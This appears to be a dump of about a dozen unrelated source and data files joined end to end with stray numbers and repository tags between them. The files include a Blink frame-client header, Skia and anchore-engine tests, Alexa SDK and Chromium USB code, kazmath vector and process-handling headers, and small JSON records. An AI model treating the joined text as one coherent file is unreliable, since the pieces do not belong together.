actualValue contains the value of // the input field. virtual bool runModalPromptDialog(const WebString& message, const WebString& defaultValue, WebString* actualValue) { return false; } // Displays a modal confirmation dialog with OK/Cancel choices, where 'OK' // means that it is okay to proceed with closing the view. Returns true if // the user selects 'OK' or false otherwise. virtual bool runModalBeforeUnloadDialog(bool isReload) { return true; } // This method returns immediately after showing the dialog. When the // dialog is closed, it should call the WebFileChooserCompletion to // pass the results of the dialog. Returns false if // WebFileChooseCompletion will never be called. virtual bool runFileChooser(const blink::WebFileChooserParams& params, WebFileChooserCompletion* chooserCompletion) { return false; } // UI ------------------------------------------------------------------ // Shows a context menu with commands relevant to a specific element on // the given frame. Additional context data is supplied. virtual void showContextMenu(const WebContextMenuData&) {} // This method is called in response to WebView's saveImageAt(x, y). // A data url from <canvas> or <img> is passed to the method's argument. virtual void saveImageFromDataURL(const WebString&) {} // Low-level resource notifications ------------------------------------ // A request is about to be sent out, and the client may modify it. Request // is writable, and changes to the URL, for example, will change the request // made. virtual void willSendRequest(WebLocalFrame*, WebURLRequest&) {} // Response headers have been received. virtual void didReceiveResponse(const WebURLResponse&) {} // The specified request was satified from WebCore's memory cache. virtual void didLoadResourceFromMemoryCache(const WebURLRequest&, const WebURLResponse&) {} // This frame has displayed inactive content (such as an image) from an // insecure source. Inactive content cannot spread to other frames. virtual void didDisplayInsecureContent() {} // The indicated security origin has run active content (such as a // script) from an insecure source. Note that the insecure content can // spread to other frames in the same origin. virtual void didRunInsecureContent(const WebSecurityOrigin&, const WebURL& insecureURL) {} // A reflected XSS was encountered in the page and suppressed. virtual void didDetectXSS(const WebURL&, bool didBlockEntirePage) {} // A PingLoader was created, and a request dispatched to a URL. virtual void didDispatchPingLoader(const WebURL&) {} // This frame has displayed inactive content (such as an image) from // a connection with certificate errors. virtual void didDisplayContentWithCertificateErrors(const WebURL& url) {} // This frame has run active content (such as a script) from a // connection with certificate errors. virtual void didRunContentWithCertificateErrors(const WebURL& url) {} // A performance timing event (e.g. first paint) occurred virtual void didChangePerformanceTiming() {} // Blink exhibited a certain loading behavior that the browser process will // use for segregated histograms. virtual void didObserveLoadingBehavior(WebLoadingBehaviorFlag) {} // Script notifications ------------------------------------------------ // Notifies that a new script context has been created for this frame. // This is similar to didClearWindowObject but only called once per // frame context. virtual void didCreateScriptContext(WebLocalFrame*, v8::Local<v8::Context>, int worldId) {} // WebKit is about to release its reference to a v8 context for a frame. virtual void willReleaseScriptContext(WebLocalFrame*, v8::Local<v8::Context>, int worldId) {} // Geometry notifications ---------------------------------------------- // The main frame scrolled. virtual void didChangeScrollOffset(WebLocalFrame*) {} // If the frame is loading an HTML document, this will be called to // notify that the <body> will be attached soon. virtual void willInsertBody(WebLocalFrame*) {} // Find-in-page notifications ------------------------------------------ // Notifies how many matches have been found in this frame so far, for a // given identifier. |finalUpdate| specifies whether this is the last // update for this frame. virtual void reportFindInPageMatchCount(int identifier, int count, bool finalUpdate) {} // Notifies what tick-mark rect is currently selected. The given // identifier lets the client know which request this message belongs // to, so that it can choose to ignore the message if it has moved on // to other things. The selection rect is expected to have coordinates // relative to the top left corner of the web page area and represent // where on the screen the selection rect is currently located. virtual void reportFindInPageSelection(int identifier, int activeMatchOrdinal, const WebRect& selection) {} // Quota --------------------------------------------------------- // Requests a new quota size for the origin's storage. // |newQuotaInBytes| indicates how much storage space (in bytes) the // caller expects to need. // WebStorageQuotaCallbacks::didGrantStorageQuota will be called when // a new quota is granted. WebStorageQuotaCallbacks::didFail // is called with an error code otherwise. // Note that the requesting quota size may not always be granted and // a smaller amount of quota than requested might be returned. virtual void requestStorageQuota(WebStorageQuotaType, unsigned long long newQuotaInBytes, WebStorageQuotaCallbacks) {} // MediaStream ----------------------------------------------------- // A new WebRTCPeerConnectionHandler is created. virtual void willStartUsingPeerConnectionHandler( WebRTCPeerConnectionHandler*) {} virtual WebUserMediaClient* userMediaClient() { return 0; } // Encrypted Media ------------------------------------------------- virtual WebEncryptedMediaClient* encryptedMediaClient() { return 0; } // User agent ------------------------------------------------------ // Asks the embedder if a specific user agent should be used. Non-empty // strings indicate an override should be used. Otherwise, // Platform::current()->userAgent() will be called to provide one. virtual WebString userAgentOverride() { return WebString(); } // Do not track ---------------------------------------------------- // Asks the embedder what value the network stack will send for the DNT // header. An empty string indicates that no DNT header will be send. virtual WebString doNotTrackValue() { return WebString(); } // WebGL ------------------------------------------------------ // Asks the embedder whether WebGL is allowed for the WebFrame. This call is // placed here instead of WebContentSettingsClient because this class is // implemented in content/, and putting it here avoids adding more public // content/ APIs. virtual bool allowWebGL(bool defaultValue) { return defaultValue; } // Screen Orientation -------------------------------------------------- // Access the embedder API for (client-based) screen orientation client . virtual WebScreenOrientationClient* webScreenOrientationClient() { return 0; } // Accessibility ------------------------------------------------------- // Notifies embedder about an accessibility event. virtual void postAccessibilityEvent(const WebAXObject&, WebAXEvent) {} // Provides accessibility information about a find in page result. virtual void handleAccessibilityFindInPageResult( int identifier, int matchIndex, const WebAXObject& startObject, int startOffset, const WebAXObject& endObject, int endOffset) {} // ServiceWorker ------------------------------------------------------- // Whether the document associated with WebDataSource is controlled by the // ServiceWorker. virtual bool isControlledByServiceWorker(WebDataSource&) { return false; } // Returns an identifier of the service worker controlling the document // associated with the WebDataSource. virtual int64_t serviceWorkerID(WebDataSource&) { return -1; } // Fullscreen ---------------------------------------------------------- // Called to enter/exit fullscreen mode. // After calling enterFullscreen or exitFullscreen, // WebWidget::didEnterFullscreen or WebWidget::didExitFullscreen // respectively will be called once the fullscreen mode has changed. virtual void enterFullscreen() {} virtual void exitFullscreen() {} // Sudden termination -------------------------------------------------- // Called when elements preventing the sudden termination of the frame // become present or stop being present. |type| is the type of element // (BeforeUnload handler, Unload handler). enum SuddenTerminationDisablerType { BeforeUnloadHandler, UnloadHandler, }; virtual void suddenTerminationDisablerChanged(bool present, SuddenTerminationDisablerType) { } // Navigator Content Utils -------------------------------------------- // Registers a new URL handler for the given protocol. virtual void registerProtocolHandler(const WebString& scheme, const WebURL& url, const WebString& title) {} // Unregisters a given URL handler for the given protocol. virtual void unregisterProtocolHandler(const WebString& scheme, const WebURL& url) {} // Check if a given URL handler is registered for the given protocol. virtual WebCustomHandlersState isProtocolHandlerRegistered( const WebString& scheme, const WebURL& url) { return WebCustomHandlersNew; } // Audio Output Devices API -------------------------------------------- // Checks that the given audio sink exists and is authorized. The result is // provided via the callbacks. This method takes ownership of the callbacks // pointer. virtual void checkIfAudioSinkExistsAndIsAuthorized( const WebString& sinkId, const WebSecurityOrigin&, WebSetSinkIdCallbacks* callbacks) { if (callbacks) { callbacks->onError(WebSetSinkIdError::NotSupported); delete callbacks; } } // Mojo ---------------------------------------------------------------- virtual InterfaceProvider* interfaceProvider() { return nullptr; } virtual InterfaceRegistry* interfaceRegistry() { return nullptr; } // Visibility ---------------------------------------------------------- // Returns the current visibility of the WebFrame. virtual WebPageVisibilityState visibilityState() const { return WebPageVisibilityStateVisible; } // Overwrites the given URL to use an HTML5 embed if possible. // An empty URL is returned if the URL is not overriden. virtual WebURL overrideFlashEmbedWithHTML(const WebURL& url) { return WebURL(); } }; } // namespace blink #endif
9,599
7,482
/* * Copyright (c) 2020-2020, BLUETRUM Development Team * * SPDX-License-Identifier: Apache-2.0 */ #ifndef BMSIS_GCC_H__ #define BMSIS_GCC_H__ /* ignore some GCC warnings */ #if defined ( __GNUC__ ) #pragma GCC diagnostic push #pragma GCC diagnostic ignored "-Wsign-conversion" #pragma GCC diagnostic ignored "-Wconversion" #pragma GCC diagnostic ignored "-Wunused-parameter" #endif #endif
142
303
{"id":1728,"line-1":"Texas","line-2":"United States","attribution":"©2014 DigitalGlobe, Texas Orthoimagery Program","url":"https://www.google.com/maps/@32.631906,-100.543960,19z/data=!3m1!1e3"}
74
5,964
/* * Copyright 2012 Google Inc. * * Use of this source code is governed by a BSD-style license that can be * found in the LICENSE file. */ #include "PathOpsTestCommon.h" #include "SkPathOpsCubic.h" #include "Test.h" static const SkDCubic hullTests[] = { {{{2.6250000819563866, 2.3750000223517418}, {2.833333432674408, 2.3333333432674408}, {3.1111112236976624, 2.3333333134651184}, {3.4074075222015381, 2.3333332538604736}}}, }; static const size_t hullTests_count = SK_ARRAY_COUNT(hullTests); DEF_TEST(PathOpsCubicHull, reporter) { for (size_t index = 0; index < hullTests_count; ++index) { const SkDCubic& cubic = hullTests[index]; char order[4]; cubic.convexHull(order); } }
297
1,484
<reponame>ballad86/anchore-engine import json def is_overwrite_msg_in_log(caplog, pkg, pkg_type): return f"{pkg} package already present under {pkg_type}" in caplog.text class TestHintsNPM: def test_npm_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "safe-buffer", "location": "/usr/lib/node_modules/npm/node_modules/string_decoder/node_modules/safe-buffer/package.json", "license": "FREE-FOR-ALL", "version": "100", "type": "npm", }, { "name": "toure-awesome", "license": "Propietary", "version": "1.0rc", "type": "npm", }, { "name": "lodash", "location": "/node_modules/lodash/package.json", "version": "1.9.4", "license": "Not a real license", "type": "npm", }, ] } result = hints_image(hints, "npm") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.npms" ]["base"] # Package not already present in report so verify it matches hint path = "/usr/lib/node_modules/npm/node_modules/string_decoder/node_modules/safe-buffer/package.json" package = pkgs.get(path) assert package["name"] == "safe-buffer" assert package["lics"] == ["FREE-FOR-ALL"] assert package["versions"] == ["100"] assert package.get("sourcepkg") == "safe-buffer" # Package not already present in report so verify it matches hint package = pkgs.get("/virtual/npmpkg/toure-awesome-1.0rc") assert package["name"] == "toure-awesome" assert package["lics"] == ["Propietary"] assert package["versions"] == ["1.0rc"] # Package already in report so verify hint did not overwrite it package = pkgs.get("/node_modules/lodash/package.json") assert package["name"] == "lodash" assert package["lics"] != ["Not a real license"] assert package["versions"] != ["1.9.4"] assert ( is_overwrite_msg_in_log( caplog, "/node_modules/lodash/package.json", "pkgs.npm" ) is True ) class TestHintsRPM: def test_rpm_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "zlib", "license": "test some other license", "version": "987654:1.2.11-16.el8_2", "type": "rpm", "origin": "CentOS", }, { "name": "fedora-gpg-keys", "version": "35-0.4", "arch": "noarch", "type": "rpm", "license": "test-license", }, ] } result = hints_image(hints, "rpm") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.allinfo" ]["base"] # Package already in report so verify hint did not overwrite it package = pkgs.get("zlib") assert package["type"] == "rpm" assert package["license"] != "test some other license" assert "987654:1.2.11" not in package["version"] assert is_overwrite_msg_in_log(caplog, "zlib", "pkgs.allinfo") is True # Package not already present in report so verify it matches hint package = pkgs.get("fedora-gpg-keys") assert package["type"] == "rpm" assert package["license"] == "test-license" assert package["version"] == "35" class TestHintsDPKG: def test_dpkg_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "adduser", "version": "43", "license": "GPL", "type": "dpkg", }, { "name": "master-alex", "version": "0.0.1rc", "license": "LGPLv8", "type": "dpkg", }, ] } result = hints_image(hints, "stretch-slim") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.allinfo" ]["base"] # Package already in report so verify hint did not overwrite it package = pkgs.get("adduser") assert package["type"] == "dpkg" assert package["version"] != "43" assert package["license"] != "GPL" assert is_overwrite_msg_in_log(caplog, "adduser", "pkgs.allinfo") is True # Package not already present in report so verify it matches hint package = pkgs.get("master-alex") assert package["type"] == "dpkg" assert package["version"] == "0.0.1rc" assert package["license"] == "LGPLv8" class TestHintsJava: def test_java_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "TwilioNotifier-test-override", "origin": "com.twilio.test-override", "location": "/TwilioNotifier.hpi", "type": "java", "version": "N/A", }, { "name": "developer-dan", "origin": "com.twilio.jenkins", "type": "java", "version": "193.28", }, ] } result = hints_image(hints, "java") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.java" ]["base"] # Package already in report so verify hint did not overwrite it packages = pkgs.get("/TwilioNotifier.hpi") assert packages["type"] == "java-hpi" assert packages["location"] == "/TwilioNotifier.hpi" assert packages["origin"] != "com.twilio.test-override" assert packages["name"] != "TwilioNotifier-test-override" assert ( is_overwrite_msg_in_log(caplog, "/TwilioNotifier.hpi", "pkgs.java") is True ) # Package already in report so verify hint did not overwrite it packages = pkgs.get("/virtual/javapkg/developer-dan-193.28.jar") assert packages["type"] == "java-jar" assert packages["origin"] == "com.twilio.jenkins" assert packages["implementation-version"] == "193.28" class TestHintsAPKG: def test_apkg_hints(self, hints_image, caplog): hints = { "packages": [ { "version": "2.2", "sourcepkg": "alpine-keys", "release": "r3", "origin": "<NAME> <<EMAIL>>", "arch": "x86_64", "license": "Apache", "size": "1000", "type": "APKG", "name": "alpine-keys", }, { "version": "5.2", "sourcepkg": "test-pkg", "release": "r1", "origin": "something", "arch": "x86_64", "license": "Apache", "size": "200", "type": "APKG", "name": "test-pkg", }, ] } result = hints_image(hints, "py38") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.allinfo" ]["base"] # Package already in report so verify hint did not overwrite it packages = pkgs.get("alpine-keys") assert packages["type"] == "APKG" assert packages["size"] != "1000" assert packages["license"] != "Apache" assert packages["release"] != "r3" assert is_overwrite_msg_in_log(caplog, "alpine-keys", "pkgs.allinfo") is True # Package not already present in report so verify it matches hint packages = pkgs.get("test-pkg") assert packages["type"] == "APKG" assert packages["size"] == "200" assert packages["license"] == "Apache" assert packages["release"] == "r1" class TestHintsPython: def test_python_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "py", "version": "1.9.1", "type": "python", "location": "/usr/lib/python3.8/my-site-packages", }, { "name": "hints-spectacular", "version": "1.0.0alpha", "type": "python", }, { "name": "hintstest", "version": "3.2.1", "type": "python", "location": "/usr/lib/python3.8/my-site-packages", }, ] } result = hints_image(hints, "py38") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.python" ]["base"] # Package not already present in report so verify it matches hint packages = pkgs.get("/usr/lib/python3.8/my-site-packages") assert packages["type"] == "python" assert packages["version"] == "1.9.1" assert packages["location"] == "/usr/lib/python3.8/my-site-packages" # Package not already present in report so verify it matches hint packages = pkgs.get("/virtual/pypkg/site-packages") assert packages["type"] == "python" assert packages["name"] == "hints-spectacular" assert packages["version"] == "1.0.0alpha" # Package already in report so verify hint did not overwrite it packages = pkgs.get("/usr/lib/python3.8/my-site-packages") assert packages["type"] == "python" assert packages["name"] != "hintstest" assert packages["version"] != "3.2.1" assert ( is_overwrite_msg_in_log( caplog, "/usr/lib/python3.8/my-site-packages", "pkgs.python" ) is True ) class TestHintsGem: def test_gem_hints(self, hints_image, caplog): hints = { "packages": [ { "name": "uri", "licenses": ["GPL"], "version": "0.11.0", "origins": ["<NAME>"], "source": "https://example.com", "type": "gem", "location": "/usr/lib/ruby/gems/2.7.0/specifications/default/uri-0.10.0.gemspec", }, { "name": "diamonds", "version": "2.0", "type": "gem", }, { "name": "test-override", "licenses": ["license-override"], "version": "3.2.0", "origins": ["Zane"], "source": "https://example.com/test-override", "type": "gem", "location": "/usr/lib/ruby/gems/2.7.0/specifications/bundler-2.1.4.gemspec", }, ] } result = hints_image(hints, "lean") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.gems" ]["base"] path = "/usr/lib/ruby/gems/2.7.0/specifications/default/uri-0.10.0.gemspec" packages = pkgs.get(path) # Package not already present in report so verify it matches hint assert packages["lics"] == ["GPL"] assert packages["versions"] == ["0.11.0"] assert packages["sourcepkg"] == "https://example.com" assert packages["type"] == "gem" # Package not already present in report so verify it matches hint packages = pkgs.get("/virtual/gempkg/diamonds-2.0") assert packages["type"] == "gem" assert packages["versions"] == ["2.0"] # Package already in report so verify hint did not overwrite it packages = pkgs.get( "/usr/lib/ruby/gems/2.7.0/specifications/bundler-2.1.4.gemspec" ) assert packages["lics"] != ["license-override"] assert packages["versions"] != ["3.2.0"] assert packages["sourcepkg"] != "https://example.com/test-override" assert ( is_overwrite_msg_in_log( caplog, "/usr/lib/ruby/gems/2.7.0/specifications/bundler-2.1.4.gemspec", "pkgs.gems", ) is True ) class TestHintsGo: def test_go_hints(self, hints_image, analyzed_data): hints = { "packages": [ { "name": "kind", "version": "v0.10.0", "type": "go", "license": "Apache2.0", }, ] } result = hints_image(hints, "lean") pkgs = result["image"]["imagedata"]["analysis_report"]["package_list"][ "pkgs.go" ]["base"] package = json.loads(pkgs.get("/virtual/gopkg/kind-v0.10.0")) # Package not already present in report so verify it matches hint assert package["name"] == "kind" assert package["license"] == "Apache2.0" assert package["version"] == "v0.10.0"
7,401
1,444
<gh_stars>1000+ package mage.cards.m; import java.util.UUID; import mage.MageInt; import mage.ObjectColor; import mage.abilities.common.CantBeCounteredSourceAbility; import mage.abilities.common.EntersBattlefieldAbility; import mage.abilities.effects.common.EntersBattlefieldWithXCountersEffect; import mage.abilities.keyword.HasteAbility; import mage.abilities.keyword.ProtectionAbility; import mage.cards.CardImpl; import mage.cards.CardSetInfo; import mage.constants.CardType; import mage.constants.SubType; import mage.counters.CounterType; /** * * @author LevelX2 */ public final class MistcutterHydra extends CardImpl { public MistcutterHydra(UUID ownerId, CardSetInfo setInfo) { super(ownerId,setInfo,new CardType[]{CardType.CREATURE},"{X}{G}"); this.subtype.add(SubType.HYDRA); this.power = new MageInt(0); this.toughness = new MageInt(0); // Mistcutter Hydra can't be countered. this.addAbility(new CantBeCounteredSourceAbility()); // Haste this.addAbility(HasteAbility.getInstance()); // protection from blue this.addAbility(ProtectionAbility.from(ObjectColor.BLUE)); // Mistcutter Hydra enters the battlefield with X +1/+1 counters on it. this.addAbility(new EntersBattlefieldAbility(new EntersBattlefieldWithXCountersEffect(CounterType.P1P1.createInstance()))); } private MistcutterHydra(final MistcutterHydra card) { super(card); } @Override public MistcutterHydra copy() { return new MistcutterHydra(this); } }
572
348
<reponame>chamberone/Leaflet.PixiOverlay<gh_stars>100-1000 {"nom":"Ambres","circ":"3ème circonscription","dpt":"Tarn","inscrits":816,"abs":384,"votants":432,"blancs":35,"nuls":8,"exp":389,"res":[{"nuance":"LR","nom":"<NAME>","voix":227},{"nuance":"REM","nom":"<NAME>","voix":162}]}
115
1,272
/* * Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. * * Licensed under the Apache License, Version 2.0 (the "License"). * You may not use this file except in compliance with the License. * A copy of the License is located at * * http://aws.amazon.com/apache2.0/ * * or in the "license" file accompanying this file. This file is distributed * on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either * express or implied. See the License for the specific language governing * permissions and limitations under the License. */ #ifndef ALEXA_CLIENT_SDK_CAPABILITYAGENTS_PLAYBACKCONTROLLER_INCLUDE_PLAYBACKCONTROLLER_PLAYBACKCONTROLLER_H_ #define ALEXA_CLIENT_SDK_CAPABILITYAGENTS_PLAYBACKCONTROLLER_INCLUDE_PLAYBACKCONTROLLER_PLAYBACKCONTROLLER_H_ #include <memory> #include <queue> #include <string> #include <acsdkManufactory/Annotated.h> #include <acsdkShutdownManagerInterfaces/ShutdownNotifierInterface.h> #include <AVSCommon/AVS/CapabilityConfiguration.h> #include <AVSCommon/AVS/MessageRequest.h> #include <AVSCommon/SDKInterfaces/CapabilityConfigurationInterface.h> #include <AVSCommon/SDKInterfaces/ContextManagerInterface.h> #include <AVSCommon/SDKInterfaces/ContextRequesterInterface.h> #include <AVSCommon/SDKInterfaces/MessageSenderInterface.h> #include <AVSCommon/SDKInterfaces/PlaybackHandlerInterface.h> #include <AVSCommon/SDKInterfaces/Endpoints/DefaultEndpointAnnotation.h> #include <AVSCommon/SDKInterfaces/Endpoints/EndpointCapabilitiesRegistrarInterface.h> #include <AVSCommon/Utils/RequiresShutdown.h> #include <AVSCommon/Utils/Threading/Executor.h> #include "PlaybackCommand.h" namespace alexaClientSDK { namespace capabilityAgents { namespace playbackController { class PlaybackController : public avsCommon::sdkInterfaces::ContextRequesterInterface , public avsCommon::sdkInterfaces::PlaybackHandlerInterface , public avsCommon::sdkInterfaces::CapabilityConfigurationInterface , public avsCommon::utils::RequiresShutdown , public std::enable_shared_from_this<PlaybackController> { public: /** * Factory method to create an instance of @c PlaybackHandlerInterface. * * @param contextManager The @c ContextManagerInterface used to generate system context for events. * @param messageSender The @c MessageSenderInterface that sends events to AVS. * @return @c nullptr if the inputs are not defined, else a new instance of @c PlaybackController. */ static std::shared_ptr<PlaybackHandlerInterface> createPlaybackHandlerInterface( std::shared_ptr<avsCommon::sdkInterfaces::ContextManagerInterface> contextManager, std::shared_ptr<avsCommon::sdkInterfaces::MessageSenderInterface> messageSender, std::shared_ptr<acsdkShutdownManagerInterfaces::ShutdownNotifierInterface> shutdownNotifier, acsdkManufactory::Annotated< avsCommon::sdkInterfaces::endpoints::DefaultEndpointAnnotation, avsCommon::sdkInterfaces::endpoints::EndpointCapabilitiesRegistrarInterface> defaultEndpointCapabilitiesRegistrar); /** * Create an instance of @c PlaybackController. * * @param contextManager The @c ContextManagerInterface used to generate system context for events. * @param messageSender The @c MessageSenderInterface that sends events to AVS. * @return @c nullptr if the inputs are not defined, else a new instance of @c PlaybackController. */ static std::shared_ptr<PlaybackController> create( std::shared_ptr<avsCommon::sdkInterfaces::ContextManagerInterface> contextManager, std::shared_ptr<avsCommon::sdkInterfaces::MessageSenderInterface> messageSender); /** * Destructor. */ virtual ~PlaybackController() = default; /// @name ContextRequesterInterface Functions /// @{ void onContextAvailable(const std::string& jsonContext) override; void onContextFailure(const avsCommon::sdkInterfaces::ContextRequestError error) override; /// @} /// @name PlaybackControllerInterface Functions /// @{ void onButtonPressed(avsCommon::avs::PlaybackButton button) override; void onTogglePressed(avsCommon::avs::PlaybackToggle toggle, bool action) override; /// @} /// @name CapabilityConfigurationInterface Functions /// @{ std::unordered_set<std::shared_ptr<avsCommon::avs::CapabilityConfiguration>> getCapabilityConfigurations() override; /// @} /** * Manage completion of event being sent. * * @param PlaybackCommand The @PlaybackButton or @PlaybackToggle that was pressed to generate the message sent. * @param messageStatus The status of submitted @c MessageRequest. */ void messageSent( const PlaybackCommand&, avsCommon::sdkInterfaces::MessageRequestObserverInterface::Status messageStatus); private: /** * Constructor. * * @param contextManager The AVS Context manager used to generate system context for events. * @param messageSender The message sender interface that sends events to AVS. */ PlaybackController( std::shared_ptr<avsCommon::sdkInterfaces::ContextManagerInterface> contextManager, std::shared_ptr<avsCommon::sdkInterfaces::MessageSenderInterface> messageSender); // @name RequiresShutdown Functions /// @{ void doShutdown() override; /// @} /** * Process the @c PlaybackCommand for the pressed button. * * @param The @c PlaybackCommand associated with the button pressed. */ void handleCommand(const PlaybackCommand& command); /** * @name Executor Thread Variables * * These member variables are only accessed by functions in the @c m_executor worker thread, and do not require any * synchronization. */ /// @{ /// The @c MessageSenderInterface used to send event messages. std::shared_ptr<avsCommon::sdkInterfaces::MessageSenderInterface> m_messageSender; /// The @c ContextManager used to generate system context for events. std::shared_ptr<avsCommon::sdkInterfaces::ContextManagerInterface> m_contextManager; /// The queue for storing the commands. std::queue<const PlaybackCommand*> m_commands; /// @} /// Set of capability configurations that will get published using the Capabilities API std::unordered_set<std::shared_ptr<avsCommon::avs::CapabilityConfiguration>> m_capabilityConfigurations; /// The @c Executor which queues up operations from asynchronous API calls to the @c PlaybackControllerInterface. avsCommon::utils::threading::Executor m_executor; }; } // namespace playbackController } // namespace capabilityAgents } // namespace alexaClientSDK #endif // ALEXA_CLIENT_SDK_CAPABILITYAGENTS_PLAYBACKCONTROLLER_INCLUDE_PLAYBACKCONTROLLER_PLAYBACKCONTROLLER_H_
2,238
14,668
<reponame>zealoussnow/chromium<gh_stars>1000+ // Copyright 2015 The Chromium Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include "services/device/usb/mock_usb_device.h" #include <utility> #include "base/strings/utf_string_conversions.h" namespace device { MockUsbDevice::MockUsbDevice(uint16_t vendor_id, uint16_t product_id) : MockUsbDevice(vendor_id, product_id, "", "", "") {} MockUsbDevice::MockUsbDevice(uint16_t vendor_id, uint16_t product_id, const std::string& manufacturer_string, const std::string& product_string, const std::string& serial_number) : UsbDevice(0x0200, // usb_version 0xff, // device_class 0xff, // device_subclass 0xff, // device_protocol vendor_id, product_id, 0x0100, // device_version base::UTF8ToUTF16(manufacturer_string), base::UTF8ToUTF16(product_string), base::UTF8ToUTF16(serial_number), /*bus_number=*/0, /*port_number=*/0) {} MockUsbDevice::~MockUsbDevice() = default; void MockUsbDevice::AddMockConfig(mojom::UsbConfigurationInfoPtr config) { device_info_->configurations.push_back(std::move(config)); } void MockUsbDevice::ActiveConfigurationChanged(int configuration_value) { UsbDevice::ActiveConfigurationChanged(configuration_value); } void MockUsbDevice::NotifyDeviceRemoved() { UsbDevice::NotifyDeviceRemoved(); } } // namespace device
773
471
/* Copyright (c) 2008, <NAME>. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef VEC4_H_INCLUDED #define VEC4_H_INCLUDED #include "utility.h" struct kmMat4; #pragma pack(push) /* push current alignment to stack */ #pragma pack(1) /* set alignment to 1 byte boundary */ typedef struct kmVec4 { kmScalar x; kmScalar y; kmScalar z; kmScalar w; } kmVec4; #pragma pack(pop) #ifdef __cplusplus extern "C" { #endif kmVec4* kmVec4Fill(kmVec4* pOut, kmScalar x, kmScalar y, kmScalar z, kmScalar w); kmVec4* kmVec4Add(kmVec4* pOut, const kmVec4* pV1, const kmVec4* pV2); kmScalar kmVec4Dot(const kmVec4* pV1, const kmVec4* pV2); kmScalar kmVec4Length(const kmVec4* pIn); kmScalar kmVec4LengthSq(const kmVec4* pIn); kmVec4* kmVec4Lerp(kmVec4* pOut, const kmVec4* pV1, const kmVec4* pV2, kmScalar t); kmVec4* kmVec4Normalize(kmVec4* pOut, const kmVec4* pIn); kmVec4* kmVec4Scale(kmVec4* pOut, const kmVec4* pIn, const kmScalar s); /**< Scales a vector to length s*/ kmVec4* kmVec4Subtract(kmVec4* pOut, const kmVec4* pV1, const kmVec4* pV2); kmVec4* kmVec4Mul( kmVec4* pOut,const kmVec4* pV1, const kmVec4* pV2 ); kmVec4* kmVec4Div( kmVec4* pOut,const kmVec4* pV1, const kmVec4* pV2 ); kmVec4* kmVec4MultiplyMat4(kmVec4* pOut, const kmVec4* pV, const struct kmMat4* pM); kmVec4* kmVec4Transform(kmVec4* pOut, const kmVec4* pV, const struct kmMat4* pM); kmVec4* kmVec4TransformArray(kmVec4* pOut, unsigned int outStride, const kmVec4* pV, unsigned int vStride, const struct kmMat4* pM, unsigned int count); int kmVec4AreEqual(const kmVec4* p1, const kmVec4* p2); kmVec4* kmVec4Assign(kmVec4* pOut, const kmVec4* pIn); #ifdef __cplusplus } #endif #endif /* VEC4_H_INCLUDED */
1,176
354
<gh_stars>100-1000 #ifndef _DEPROCESS_H #define _DEPROCESS_H /*------------------------------------------------------------------------- * drawElements Utility Library * ---------------------------- * * Copyright 2014 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * *//*! * \file * \brief Process abstraction. *//*--------------------------------------------------------------------*/ #include "deDefs.h" #include "deFile.h" DE_BEGIN_EXTERN_C /* Process types. */ typedef struct deProcess_s deProcess; deProcess* deProcess_create (void); void deProcess_destroy (deProcess* process); deBool deProcess_start (deProcess* process, const char* commandLine, const char* workingDirectory); deBool deProcess_isRunning (deProcess* process); deBool deProcess_waitForFinish (deProcess* process); const char* deProcess_getLastError (const deProcess* process); int deProcess_getExitCode (const deProcess* process); /* Non-blocking operations. */ deBool deProcess_terminate (deProcess* process); deBool deProcess_kill (deProcess* process); /* Files are owned by process - don't call deFile_destroy(). */ deFile* deProcess_getStdIn (deProcess* process); deFile* deProcess_getStdOut (deProcess* process); deFile* deProcess_getStdErr (deProcess* process); deBool deProcess_closeStdIn (deProcess* process); deBool deProcess_closeStdOut (deProcess* process); deBool deProcess_closeStdErr (deProcess* process); DE_END_EXTERN_C #endif /* _DEPROCESS_H */
660
764
